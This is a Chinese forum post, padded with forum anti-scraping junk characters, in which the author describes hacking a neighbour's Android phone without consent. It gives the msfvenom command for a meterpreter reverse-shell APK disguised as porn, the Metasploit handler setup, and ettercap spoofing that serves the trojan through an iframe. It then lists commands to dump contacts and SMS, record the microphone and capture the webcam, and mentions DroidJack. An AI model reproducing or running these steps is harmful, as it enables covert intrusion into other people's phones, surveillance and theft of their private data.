找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1873|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ P# ]' z% r4 z0 f }3 h% @5 }" K 五、msf+ettercap入侵邻居安卓手机 s F2 k7 a2 d9 O5 O3 l0 G1 a$ j

% _2 P4 X( Q% U2 u

6 x; {, Z+ E( @. f' R( h 首先启动msf * c7 P! A: f: W/ W/ g* J O2 @9 e: y

+ r2 _. S2 }' n; E; n

7 n+ d" h% ]( T: p3 ?) s5 P 先用kali生成一个安卓木马,如下命令: ' a/ C" G. S) \$ I& H

9 }: M( J% N$ K

9 j8 g. C7 @- d+ j Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 0 f- E( f) P8 J

0 J O4 q6 E! [! O

$ F0 N( b2 t+ [ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 3 K% @3 F$ h6 X* x+ W

3 Z4 C7 p: C* Y' t: G

; R( H$ K+ p( c& C( @3 @% w 然后进入msf 5 z, L6 S/ Y3 u2 O. j* a. c' g6 A

& D4 H7 j" l5 u7 E! O$ f

: W% D, X0 X& S! P7 k use exploit/multi/handler . ^# L8 S8 {7 M/ W0 w; X

$ @8 d# Y) V2 v. F, a, M% Q

- z. R9 `' }: M5 P; b. l: v+ | set payload android/meterpreter/reverse_tcp # @& X, a2 C# \

1 f* ` q& I1 k" T8 c8 b

( P9 W+ c4 L0 W, G% g8 R set LHOST 192.168.0.109 //ipkailiip - N" D0 M5 ?& U' {( C+ D8 e5 \

2 O) U: E1 F2 ^' R

# \+ F6 Z9 b9 }( U% r3 q set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) ?. x# Z: f5 K6 J# E V& t. `2 G

. F7 k/ y, D" u$ p- |& o1 [

3 Q$ z& P m+ O1 [ Exploit 4 Q0 r! F8 T* X/ [: x/ V. `* D# v

6 D) ~% }. V5 H7 ?- s

' f3 v, }( }! T6 w: ^   2 \# Y+ Y* |1 I. a$ s

1 N0 H: u B: G1 I

, y% V# Q: \6 t# |. M% T 下面我们开启ettercap -G . w8 G0 ~+ Y# |9 F) U

9 W% P t6 {% L, ^1 X

+ s9 D& L* ?: X5 ?; \! W 我物理IP * C8 x6 t" h; ^- u" q0 \" S- e; D

8 m$ D6 C$ x9 _

# J7 |( Q" R2 d ~" o4 h   3 G, c4 X5 B( p: X

( n& ^1 R( C: w- i

: I4 R+ S$ w- a# a( s8 G2 |0 I 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 1 Y( k8 |, N: N" u+ s, V

$ [( ]! G' D& l) `0 g- O

! |% R( I7 l2 u+ o: L 下面我们来设置一下 5 p; T, m( q2 p; w" ^2 F3 A# O1 f1 D

" w" o7 I& q0 r) q9 Q0 _

1 H ?8 Q2 U _. u8 H4 m   , x% K. Z) ~5 c6 q4 Z/ Z8 i4 {

3 H U3 r# F6 g9 M, ?' F/ x% V

% x0 h" E n9 J' O3 r6 |4 ? 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ' s0 J5 e& M- r) S8 P% |

2 @* \& i6 I( A/ m5 U3 m% z m

" `3 L& X: L' Y& z* T: b2 w* k0 m   & n2 f# |( y: M- q! g, y

' e0 Z; T* t! j. m% R

5 r$ Z; i1 A0 Y' p   " B% f. u: V8 i+ m( t4 y

. J" g( Z2 V1 `/ ]5 ]! h( b

- d3 d4 k+ E+ ~, v V   0 G2 y8 y* Y- u" c | Y: j

8 f: c3 r& R: ?! g7 ~8 B

9 I" A' e* n& B7 W, \   2 `" ?4 f" B: ^6 [4 f1 _

2 z$ N1 I3 z* x7 p0 W

7 w8 u4 E& g0 c   ; {2 e$ |. \- G Z' ^

) E- k5 A2 Z' G! E( Q

0 a/ O$ T3 F# Y   : ^5 F" u+ n/ S+ k" U/ Y! K9 w. q o

/ _6 G1 D5 j: m- G" H

6 ~1 I I3 r+ P! d |% g3 }   / F/ L( L6 i" i( s0 l0 Z/ G

; x' L, c: g( ]4 R7 P

0 @2 n" s" @6 E' H- |. l& N& p! n- O   $ |* \, ~2 u% ]0 e9 p6 y9 ~* K0 l9 e

* p4 ` p5 t, K. A

7 j" }8 w+ Y+ ?8 u! ^5 o s   4 p4 n2 K( g5 F7 `

* @) Y% Y3 n" `/ Q+ y, D

9 j) G6 m4 p2 @/ O+ u% p7 m0 }- f   + _% b. g# ^1 ]( ?0 J0 u+ A( A# [: o

9 Y! B" ?3 ^; o: g- S- c6 q9 y

9 B. B1 O, v3 u5 v, A+ i0 h, ]   ) l6 H: \; h% d% L. ^% V- h+ {

3 c6 |, P( e" R- E6 ~2 d

+ A" [1 H$ d$ e/ c3 P( D   1 Z7 \, c" i3 d# M9 T3 d; z

1 a- Z8 h/ O S

6 b, K' g2 p4 S3 v3 V0 x   + q7 A/ h" ~' \ p' u6 L8 q

% n2 l2 D- V- a7 N. Z

! T/ K4 t. E( M9 A- O. n( Y6 n 下面我们开始攻击 / m8 z: y( O% r6 ]6 Y$ @3 {

" S; |, b9 j& {; Z; i+ p4 `

- z6 c- A8 ^) W; V+ f   ; d+ _- q( M. |" m+ E/ M# ~- @

) u. o* K( i) r

2 G& M! o0 M+ _2 ?   & ?7 j9 X: l" B3 K6 H9 j G

1 N# h6 p9 H+ K9 [8 D" H" `

3 o( J& v7 D n: P2 `) v   - H* s! ^9 Z7 ~, N& T& m! \

: c! E( l3 y. L, G2 i$ M

. c/ ^; P! C' _5 T   / W6 X$ c! Y3 G+ l

; t. l6 \$ \' u- P6 O% [' Y

3 {" o+ y0 s: }3 o. m/ G   9 ~1 Y: A7 i. P s" x

) G6 V* {( R& ~

' V6 _( j$ g1 w5 O; P 大概过了5分钟多,发现反弹成功了 9 C# G1 o7 j7 J! B* O2 V: K

! f7 e' L6 q' q3 f. |& e3 Y

8 j! B: I. ]' W- v$ }   + J3 V: t/ P& S- S# O: i' i

% C! O5 R- t3 L# V" c& u, T

- c( n/ q8 U6 N9 `" Z* H   8 R+ L4 f! ` C% H9 Z3 W, M

; M) B1 X0 Y4 x# z% C( ~

6 L0 k- G' \$ g5 B   0 }4 T8 b2 l7 f! P' r

6 @) ~( c) T% r0 k0 y

- n/ H' t2 D2 g% ^) I: c   , H& E ^( K3 t& o8 w

- f( ?) n! F1 a: a' l9 z

! ] h$ ^: h% z7 u   S, _$ Y2 r3 d9 x

& D! D9 v& ?4 ~

' K! E X0 H, N! `- c, t- A   0 a$ e* `5 c: B, Z4 I+ u3 n

! \! {$ y ^0 H* J

' A! ?. G& W# T2 F% x5 e/ G   $ l* D5 ?' g4 E7 d6 X6 H6 L% I! H2 d

4 {' h2 m' I$ D& A8 ^, z+ F

0 p( e7 [3 I$ Z! @3 j* L2 \ 执行命令 5 P# W6 `! Y5 J

' S$ s k4 T* N) r# i0 c* y) w

: s* K n* _! q% d0 b! R7 A   8 l4 |: ^4 }; V/ M4 u

4 r* x$ y4 c0 w3 |0 x& D

" ?0 I- k% U+ T |$ I dump_contacts    --》这个是导出电话 . r1 L% ]3 S& h/ V

( ~# C0 ^# l% ~! J

; r2 M' W4 X3 N+ q$ Z, L& ?5 {9 K dump_sms --》这个是导出信息 8 G0 ]$ F$ _6 C' E

, d6 w) J/ z3 x% Q4 D

& K, K' q/ Y1 f; ?& _: e record_mic     Record audio from the default microphone for X seconds - N$ t& P- S/ _7 ~# I: j

, u9 v3 M: o. N0 y

: _9 @/ ^' |8 p% `* E0 N     webcam_chat    Start a video chat & G! l4 e( `7 @

% l' r) c2 ~: q% j0 A5 ^% q

7 U& H! o2 c2 X! D     webcam_list    List webcams 7 y$ H/ e ~, k" D. L* ^. i

" ^/ {9 S7 d1 A1 m" O- Q/ E [9 I9 P

7 a( \; W2 X: W     webcam_snap    Take a snapshot from the specified webcam ! j" }7 b# R3 T( N6 P

4 m& l1 C# k; q; D% f t- M* L

( r* ^3 D" [& A! v webcam_stream  lay a video stream from the specified webcam 9 m. E. |5 n! D7 b5 g% q" X

* k! Z- {& g" O& s% h) b2 t

( L, u, _2 f2 H3 j) ~8 }5 F   8 _, `$ z: L! ]6 f A# g' M

! o/ k0 _7 Z3 }' R( A

. D q4 ~5 H5 C# q6 Y }   9 D# d# ? M/ h5 `1 a

" \5 K* i" Z, m6 @* I

6 b; y* w1 g; N. Y1 c/ n 我们打开看一下电话薄, " M8 H+ s# h0 h. _! M+ f0 r# A, J

7 [- z2 y( @" L" O5 X: v, u6 ^

5 i* V& h) W$ A' L" f   5 w' V0 Q$ ~! [# O

( Y& A g Y6 \- o" H0 n

]" {$ p- y! V9 D   + ?! M, Z6 c( k P& J+ M5 @

8 e; o! `/ Z; w3 E: F( `; z

. {% V0 I3 N' V u9 v" u   ( F: W9 X5 i$ C( T) ]' S+ [% m0 Y

& y+ q, S& H1 x

( e% l8 r: X0 M& ]( W& e% M: E   1 ^* C1 i6 s/ T- U) R3 N

' s3 P: o0 f( D

' R7 i) \! B( R) D' ^9 l   3 d: y* [) y, |) S/ Z* t

% n7 w$ `/ Z. K" Q5 S" U \

$ x4 W9 s6 N" p& ?9 Q( x   1 d: [- \, c; V+ l3 }6 L

4 Z# h4 m$ k i& s0 M

4 ^# }/ D& G+ K% U; b! x 我们同时欺骗成DroidJack木马,使用方法如图: 9 R! d' _" c0 a) e

7 c# M- f" U5 p0 x

$ ^6 K: f9 }( f. d- d& r+ v   6 L) Y- X: F( }; w+ V5 v

7 Z) W+ `3 T& N2 H! s

' s! n# X: g$ c9 R* M! `" y   3 k% K: B" a, p$ \

% v- @: \9 @4 x. [) X9 B/ B1 I

5 u3 l1 c0 w/ r- u7 u   ; M. V7 L! e8 V- d+ d

3 x7 W- Z0 E" Q8 y8 @

4 [8 M g$ p& Q+ E5 H8 ? 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 % x$ `, x `# |' N% M0 |

$ t! }" H4 w" ?8 }* \* U" ~' N

( V# y- y2 M4 w5 y1 |6 P   + l4 o, L# s8 ~* I: Y* J: o. |

' |* @* c& O% Y% j2 |: G

2 M3 J2 d$ @+ g" `+ ?- R" l6 J, Z   + O" y5 m E9 j% V* g' e

. r! Y* k( X2 D: F, k

0 N( m9 v& r# p0 n% K7 e   ' t- Y* s5 c, A: Q: J4 G3 B

! {: K7 Y2 b2 D# Y# ?% x" C/ C" R6 C

# [0 }9 u3 ]* w2 c( K' |, C7 w ' B; [. x9 {- c( e

5 ~9 C* K: n$ G3 ?* C, U

9 T6 \# s6 y( B' z, U Y6 r
( r: m, j" ^3 o% }+ w w1 L

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表